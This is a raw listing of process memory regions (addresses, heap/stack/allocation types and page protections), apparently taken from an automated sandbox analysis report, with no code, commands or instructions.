1A5FB000
heap
page read and write
4E9F000
stack
page read and write
3E9D000
heap
page read and write
470000
heap
page read and write
4AF0000
trusted library allocation
page read and write
34B4000
heap
page read and write
1FC7000
direct allocation
page read and write
1A948000
stack
page read and write
43A5000
heap
page read and write
600000
heap
page read and write
468000
heap
page read and write
7FE898A4000
trusted library allocation
page read and write
7FE898A0000
trusted library allocation
page read and write
31C000
heap
page read and write
34E0000
heap
page read and write
3F8000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
7FE89956000
trusted library allocation
page read and write
1ACBA000
stack
page read and write
4393000
heap
page read and write
34CD000
heap
page read and write
25A0000
heap
page read and write
4AB000
heap
page read and write
360000
heap
page read and write
34ED000
heap
page read and write
4CF0000
heap
page read and write
34C1000
heap
page read and write
3507000
heap
page read and write
499000
heap
page read and write
140000
trusted library allocation
page read and write
1F00000
direct allocation
page read and write
1A7FE000
heap
page execute and read and write
1B0D5000
heap
page read and write
1D1F000
direct allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
31A000
heap
page read and write
1B0D0000
heap
page read and write
34FE000
heap
page read and write
24A0000
heap
page read and write
34B5000
heap
page read and write
7FE89C60000
trusted library allocation
page read and write
331000
heap
page read and write
342A000
heap
page read and write
3424000
heap
page read and write
3E94000
heap
page read and write
3504000
heap
page read and write
2925000
heap
page read and write
463000
heap
page read and write
12488000
trusted library allocation
page read and write
32D0000
trusted library allocation
page read and write
34E0000
heap
page read and write
1BE0000
trusted library allocation
page read and write
1F50000
heap
page read and write
7FE89A73000
trusted library allocation
page read and write
34B1000
heap
page read and write
3507000
heap
page read and write
23E000
heap
page read and write
5DC0000
heap
page read and write
34C7000
heap
page read and write
555E000
stack
page read and write
50CD000
heap
page read and write
3509000
heap
page read and write
4F2000
heap
page read and write
3EA6000
heap
page read and write
478000
heap
page read and write
2080000
heap
page execute and read and write
55AE000
stack
page read and write
7FE89B60000
trusted library allocation
page read and write
3B20000
heap
page read and write
1A4000
heap
page read and write
4395000
heap
page read and write
48CF000
stack
page read and write
1C91B000
stack
page read and write
B72000
heap
page read and write
1A60C000
heap
page read and write
1B0AF000
stack
page read and write
3504000
heap
page read and write
5BDE000
stack
page read and write
3437000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
1C3EA000
heap
page read and write
446000
heap
page read and write
24FE000
trusted library allocation
page read and write
4F6000
heap
page read and write
34B1000
heap
page read and write
1C12F000
stack
page read and write
343C000
heap
page read and write
489000
heap
page read and write
1F54000
heap
page read and write
295B000
heap
page read and write
34EA000
heap
page read and write
1A0000
heap
page read and write
2D3F000
trusted library allocation
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
459000
heap
page read and write
48D000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
670000
heap
page execute and read and write
350A000
heap
page read and write
7FE898C3000
trusted library allocation
page execute and read and write
150000
remote allocation
page read and write
5FF0000
heap
page read and write
319000
heap
page read and write
341C000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
4397000
heap
page read and write
4F6000
heap
page read and write
1AE000
heap
page read and write
3FC000
heap
page read and write
1F0000
heap
page read and write
1C389000
heap
page read and write
7FE89C3D000
trusted library allocation
page read and write
7FE8997C000
trusted library allocation
page execute and read and write
7FE899E0000
trusted library allocation
page execute and read and write
34E0000
heap
page read and write
43C8000
heap
page read and write
1A68F000
stack
page read and write
4F0000
heap
page read and write
230F000
stack
page read and write
1AD87000
heap
page read and write
3642000
trusted library allocation
page read and write
1B1CB000
stack
page read and write
31E000
heap
page read and write
34E6000
heap
page read and write
34A7000
heap
page read and write
342B000
heap
page read and write
14F000
heap
page read and write
15A000
trusted library allocation
page execute and read and write
1CA3A000
stack
page read and write
A0000
heap
page read and write
7B7000
heap
page read and write
3432000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
B50000
heap
page read and write
170000
trusted library allocation
page read and write
4E0000
heap
page read and write
342A000
heap
page read and write
343F000
heap
page read and write
4B0000
heap
page read and write
3A2000
heap
page read and write
7FE89C58000
trusted library allocation
page read and write
34EF000
heap
page read and write
43A5000
heap
page read and write
2BF9000
trusted library allocation
page read and write
4DB000
heap
page read and write
3FF000
heap
page read and write
34B2000
heap
page read and write
43A2000
heap
page read and write
34FE000
heap
page read and write
1A310000
heap
page read and write
144000
heap
page read and write
1FA0000
direct allocation
page read and write
46C000
heap
page read and write
350E000
heap
page read and write
319000
heap
page read and write
3B8000
heap
page read and write
1A59A000
stack
page read and write
50D1000
heap
page read and write
4EF000
heap
page read and write
4BC0000
trusted library allocation
page read and write
489000
heap
page read and write
1C402000
heap
page read and write
440000
heap
page read and write
1ACFF000
heap
page read and write
4BC0000
trusted library allocation
page read and write
1A626000
heap
page read and write
3509000
heap
page read and write
46D000
heap
page read and write
49C000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
34CD000
heap
page read and write
37A000
heap
page read and write
160000
trusted library allocation
page read and write
2BFD000
trusted library allocation
page read and write
1A7B4000
heap
page read and write
4FE000
heap
page read and write
2431000
trusted library allocation
page read and write
4361000
heap
page read and write
3448000
heap
page read and write
485000
heap
page read and write
3E00000
heap
page read and write
140000
heap
page read and write
1C0000
trusted library allocation
page read and write
34AF000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
4E3000
heap
page read and write
409000
heap
page read and write
391000
heap
page read and write
34C7000
heap
page read and write
4F6000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
47B3000
heap
page read and write
7FE89CE0000
trusted library allocation
page read and write
34C1000
heap
page read and write
3507000
heap
page read and write
1EE0000
direct allocation
page read and write
3074000
trusted library allocation
page read and write
34B5000
heap
page read and write
34C8000
heap
page read and write
7FE898CD000
trusted library allocation
page execute and read and write
3EE000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
2714000
heap
page read and write
19A000
stack
page read and write
236F000
trusted library allocation
page read and write
15C000
stack
page read and write
383000
heap
page read and write
1AB1B000
stack
page read and write
2B0000
heap
page read and write
350000
heap
page read and write
3459000
trusted library allocation
page read and write
1C280000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
466000
heap
page read and write
34B3000
heap
page read and write
7FE898E0000
trusted library allocation
page read and write
1D66000
heap
page read and write
7FE89C3A000
trusted library allocation
page read and write
1B120000
heap
page read and write
1E4000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
2AF0000
heap
page read and write
2E0E000
trusted library allocation
page read and write
508E000
stack
page read and write
1C36000
heap
page read and write
323000
heap
page read and write
3670000
trusted library allocation
page read and write
3504000
heap
page read and write
4DB000
heap
page read and write
34B3000
heap
page read and write
1C3D3000
heap
page read and write
3451000
heap
page read and write
3EAF000
heap
page read and write
288000
stack
page read and write
1DC0000
heap
page read and write
463000
heap
page read and write
3C7E000
stack
page read and write
90000
heap
page read and write
4F2000
heap
page read and write
442000
heap
page read and write
7FE89C70000
trusted library allocation
page read and write
593E000
stack
page read and write
4E2000
heap
page read and write
4D4000
heap
page read and write
570000
heap
page execute and read and write
7FE89C00000
trusted library allocation
page read and write
442000
heap
page read and write
49C000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
34ED000
heap
page read and write
343C000
heap
page read and write
1F60000
direct allocation
page read and write
1B3CE000
stack
page read and write
34FE000
heap
page read and write
34F9000
heap
page read and write
362B000
trusted library allocation
page read and write
34CD000
heap
page read and write
1C3FD000
heap
page read and write
4F2000
heap
page read and write
3509000
heap
page read and write
2D35000
trusted library allocation
page read and write
650000
heap
page read and write
350D000
heap
page read and write
156000
trusted library allocation
page execute and read and write
4030000
trusted library allocation
page read and write
34F9000
heap
page read and write
2E16000
trusted library allocation
page read and write
34CD000
heap
page read and write
1A7B0000
heap
page read and write
1BF90000
heap
page read and write
34A7000
heap
page read and write
3250000
trusted library allocation
page read and write
440000
heap
page read and write
4D8E000
stack
page read and write
1C7EC000
stack
page read and write
34E6000
heap
page read and write
510000
trusted library allocation
page read and write
275000
heap
page read and write
34C1000
heap
page read and write
3B7000
heap
page read and write
1C28A000
heap
page read and write
3B1000
heap
page read and write
1B10B000
heap
page read and write
1AD06000
heap
page read and write
46F000
heap
page read and write
1C0000
heap
page read and write
21CF000
stack
page read and write
34C7000
heap
page read and write
F3E000
stack
page read and write
7FE89970000
trusted library allocation
page read and write
34BC000
heap
page read and write
350E000
heap
page read and write
34E6000
heap
page read and write
4DB000
heap
page read and write
360000
heap
page read and write
4B40000
heap
page read and write
3BF000
heap
page read and write
24FC000
trusted library allocation
page read and write
20000
heap
page read and write
4DB000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
3EA6000
heap
page read and write
40D000
heap
page read and write
3660000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
1C30D000
heap
page read and write
1FC7000
direct allocation
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
3504000
heap
page read and write
7FE899A6000
trusted library allocation
page execute and read and write
7EF40000
trusted library allocation
page execute and read and write
7FE89A90000
trusted library allocation
page execute and read and write
287000
heap
page read and write
2BFB000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
540000
trusted library allocation
page read and write
1CB10000
heap
page read and write
34E6000
heap
page read and write
34E0000
heap
page read and write
1A8C9000
stack
page read and write
4FE000
heap
page read and write
1A4AC000
stack
page read and write
150000
remote allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
3427000
heap
page read and write
3E80000
heap
page read and write
3E89000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
1C7000
heap
page read and write
34CB000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
1C0BD000
stack
page read and write
2713000
trusted library allocation
page read and write
1A7BA000
stack
page read and write
7FE89BD0000
trusted library allocation
page read and write
34E0000
heap
page read and write
485000
heap
page read and write
353000
heap
page read and write
34F4000
heap
page read and write
24D6000
heap
page read and write
460000
direct allocation
page read and write
12341000
trusted library allocation
page read and write
5090000
heap
page read and write
2F92000
trusted library allocation
page read and write
4740000
heap
page read and write
342D000
heap
page read and write
3507000
heap
page read and write
1C416000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
34ED000
heap
page read and write
38F000
heap
page read and write
1A689000
heap
page read and write
4E7000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
48C000
heap
page read and write
2D5000
stack
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
1B00E000
stack
page read and write
4DB000
heap
page read and write
343C000
heap
page read and write
1C2DA000
heap
page read and write
34BC000
heap
page read and write
1B1D0000
heap
page read and write
34CD000
heap
page read and write
2D25000
trusted library allocation
page read and write
1EFF000
stack
page read and write
350000
heap
page read and write
1C335000
heap
page read and write
1B90000
trusted library allocation
page read and write
7B0000
heap
page read and write
40E000
heap
page read and write
350B000
heap
page read and write
439E000
heap
page read and write
4DB000
heap
page read and write
1B2EE000
stack
page read and write | page guard
5D20000
heap
page read and write
7FE89C24000
trusted library allocation
page read and write
1F20000
direct allocation
page read and write
D0000
heap
page read and write
4DB000
heap
page read and write
455D000
stack
page read and write
4F2000
heap
page read and write
2C02000
trusted library allocation
page read and write
317000
heap
page read and write
5DD1000
heap
page read and write
34CD000
heap
page read and write
476D000
stack
page read and write
1D03000
direct allocation
page read and write
34B7000
heap
page read and write
34E0000
heap
page read and write
4E8000
heap
page read and write
3AE000
heap
page read and write
4CB5000
heap
page read and write
3F8000
heap
page read and write
37C2000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
7FE898B3000
trusted library allocation
page read and write
7AE000
stack
page read and write
440000
heap
page read and write
498000
heap
page read and write
4F2000
heap
page read and write
43B3000
heap
page read and write
3424000
heap
page read and write
1AD04000
heap
page read and write
34C2000
heap
page read and write
34F000
heap
page read and write
34C2000
heap
page read and write
342B000
heap
page read and write
1A370000
heap
page read and write
7FE89A42000
trusted library allocation
page read and write
2513000
trusted library allocation
page read and write
37D0000
heap
page read and write
34E6000
heap
page read and write
24CC000
trusted library allocation
page read and write
12311000
trusted library allocation
page read and write
4741000
heap
page read and write
34B5000
heap
page read and write
B54000
heap
page read and write
3504000
heap
page read and write
3410000
heap
page read and write
7FE898D0000
trusted library allocation
page read and write
1A73F000
stack
page read and write
462000
heap
page read and write
1C10E000
stack
page read and write
1DF6000
heap
page read and write
1D90000
heap
page read and write
10000
heap
page read and write
1AB000
trusted library allocation
page execute and read and write
10000
heap
page read and write
21B0000
heap
page read and write
343C000
heap
page read and write
34C7000
heap
page read and write
4D0000
heap
page read and write
39F000
heap
page read and write
2570000
trusted library allocation
page read and write
478000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
34BC000
heap
page read and write
3AF000
heap
page read and write
7FE89976000
trusted library allocation
page read and write
2710000
heap
page read and write
467000
heap
page read and write
34A7000
heap
page read and write
2BF5000
trusted library allocation
page read and write
7FE89C29000
trusted library allocation
page read and write
3CA0000
heap
page read and write
3504000
heap
page read and write
410000
heap
page read and write
35A000
heap
page read and write
52BD000
stack
page read and write
383000
heap
page read and write
14D000
trusted library allocation
page execute and read and write
3E0000
trusted library allocation
page read and write
1AD76000
heap
page read and write
467F000
stack
page read and write
34C7000
heap
page read and write
34FD000
heap
page read and write
7FE89AA2000
trusted library allocation
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
34B5000
heap
page read and write
1C00000
heap
page read and write
34FD000
heap
page read and write
463000
heap
page read and write
1C349000
heap
page read and write
354000
heap
page read and write
381000
heap
page read and write
34E000
heap
page read and write
1C1CD000
stack
page read and write
3EAB000
heap
page read and write
34C1000
heap
page read and write
240000
heap
page read and write
1D30000
heap
page read and write
330000
heap
page read and write
2E12000
trusted library allocation
page read and write
1C6C0000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
1AD1B000
heap
page read and write
24E6000
trusted library allocation
page read and write
7FE89A53000
trusted library allocation
page read and write
50D000
stack
page read and write
34E6000
heap
page read and write
1D00000
direct allocation
page read and write
413000
heap
page read and write
4780000
heap
page read and write
1C25D000
stack
page read and write
34AF000
heap
page read and write
1D1B000
direct allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
366E000
trusted library allocation
page read and write
12476000
trusted library allocation
page read and write
34E6000
heap
page read and write
1A4EF000
stack
page read and write
515E000
stack
page read and write
34E0000
heap
page read and write
34FD000
heap
page read and write
34CD000
heap
page read and write
10000
heap
page read and write
3424000
heap
page read and write
46C000
heap
page read and write
4F40000
heap
page read and write
3A2000
heap
page read and write
3448000
heap
page read and write
510000
heap
page execute and read and write
12321000
trusted library allocation
page read and write
34CD000
heap
page read and write
34E6000
heap
page read and write
C0E000
stack
page read and write
478000
heap
page read and write
24D2000
trusted library allocation
page read and write
43B4000
heap
page read and write
12380000
trusted library allocation
page read and write
43B7000
heap
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
7FE89B00000
trusted library allocation
page read and write
7FE89AC8000
trusted library allocation
page read and write
1D40000
heap
page read and write
3504000
heap
page read and write
262000
stack
page read and write
350E000
heap
page read and write
3507000
heap
page read and write
1AFE0000
heap
page read and write
1D95000
heap
page read and write
1C260000
heap
page read and write
34ED000
heap
page read and write
483000
heap
page read and write
7FE89BB5000
trusted library allocation
page read and write
34BA000
heap
page read and write
3425000
heap
page read and write
1C50C000
stack
page read and write
47A000
heap
page read and write
34B1000
heap
page read and write
3425000
heap
page read and write
1FC0000
direct allocation
page read and write
1A684000
heap
page read and write
7FE89950000
trusted library allocation
page read and write
7FE89A86000
trusted library allocation
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
34CD000
heap
page read and write
1CC6F000
stack
page read and write
34AE000
heap
page read and write
7FE89C80000
trusted library allocation
page read and write
2837000
trusted library allocation
page read and write
1A7C8000
heap
page execute and read and write
17F000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
2B8000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
10000
heap
page read and write
4F6000
heap
page read and write
342A000
heap
page read and write
1A7000
trusted library allocation
page execute and read and write
7FE89BDD000
trusted library allocation
page read and write
12371000
trusted library allocation
page read and write
34E0000
heap
page read and write
1B210000
heap
page read and write
34E0000
heap
page read and write
39A0000
heap
page read and write
70E000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
34E6000
heap
page read and write
DDF000
stack
page read and write
A0000
heap
page read and write
34F9000
heap
page read and write
34AF000
heap
page read and write
1B36F000
stack
page read and write
7FE89AD0000
trusted library allocation
page read and write
34BA000
heap
page read and write
34FD000
heap
page read and write
1C3D0000
heap
page read and write
1C32F000
heap
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
34E6000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
34EF000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
34E0000
heap
page read and write
1C27E000
stack
page read and write
DDE000
stack
page read and write | page guard
20000
heap
page read and write
2D1F000
stack
page read and write
549E000
stack
page read and write
49C000
heap
page read and write
410000
heap
page read and write
1A7C4000
heap
page execute and read and write
1B206000
heap
page read and write
1AD01000
heap
page read and write
34ED000
heap
page read and write
36A000
heap
page read and write
485000
heap
page read and write
4CB9000
heap
page read and write
413000
heap
page read and write
3E9B000
heap
page read and write
34CD000
heap
page read and write
439A000
heap
page read and write
485000
heap
page read and write
48C000
heap
page read and write
7FE898A2000
trusted library allocation
page read and write
2920000
heap
page read and write
43B3000
heap
page read and write
2100000
heap
page execute and read and write
20000
heap
page read and write
30E4000
trusted library allocation
page read and write
396000
heap
page read and write
310000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
1A2000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
1D1D000
direct allocation
page read and write
133000
trusted library allocation
page execute and read and write
408000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
123A1000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
3504000
heap
page read and write
34C7000
heap
page read and write
1BFCB000
heap
page read and write
34B4000
heap
page read and write
3E99000
heap
page read and write
388000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1A8AE000
heap
page execute and read and write
340C000
stack
page read and write
4E6000
heap
page read and write
99000
heap
page read and write
24EE000
trusted library allocation
page read and write
28C0000
trusted library allocation
page execute read
2A6000
heap
page read and write
46D000
heap
page read and write
43C8000
heap
page read and write
34CB000
heap
page read and write
7FE89C03000
trusted library allocation
page read and write
1A878000
heap
page execute and read and write
1AEBE000
stack
page read and write
411000
heap
page read and write
1EC0000
direct allocation
page read and write
359000
heap
page read and write
34C7000
heap
page read and write
3AC000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3B0000
heap
page read and write
1A869000
stack
page read and write
7FE89AF0000
trusted library allocation
page read and write
516000
heap
page read and write
4DC000
heap
page read and write
210000
heap
page read and write
43B3000
heap
page read and write
1B4E0000
heap
page read and write
2E3E000
stack
page read and write
4EF000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
34A7000
heap
page read and write
2BF3000
trusted library allocation
page read and write
233000
stack
page read and write
440000
heap
page read and write
1ACF0000
heap
page read and write
76E000
stack
page read and write
34B7000
heap
page read and write
384F000
stack
page read and write
720000
trusted library allocation
page execute and read and write
24FA000
trusted library allocation
page read and write
1A5A0000
heap
page read and write
310000
heap
page read and write
7FE898D3000
trusted library allocation
page read and write
47B000
heap
page read and write
250E000
trusted library allocation
page read and write
1B1CF000
stack
page read and write
1A672000
heap
page read and write
13D000
trusted library allocation
page execute and read and write
10000
heap
page read and write
2EE000
heap
page read and write
1A708000
stack
page read and write
3504000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
4F7000
heap
page read and write
3BE000
heap
page read and write
C20000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3FA000
heap
page read and write
3507000
heap
page read and write
463000
heap
page read and write
7FE89AC4000
trusted library allocation
page read and write
34CB000
heap
page read and write
47B3000
heap
page read and write
1FD3000
direct allocation
page read and write
3509000
heap
page read and write
There are 913 hidden memdumps, click here to show them.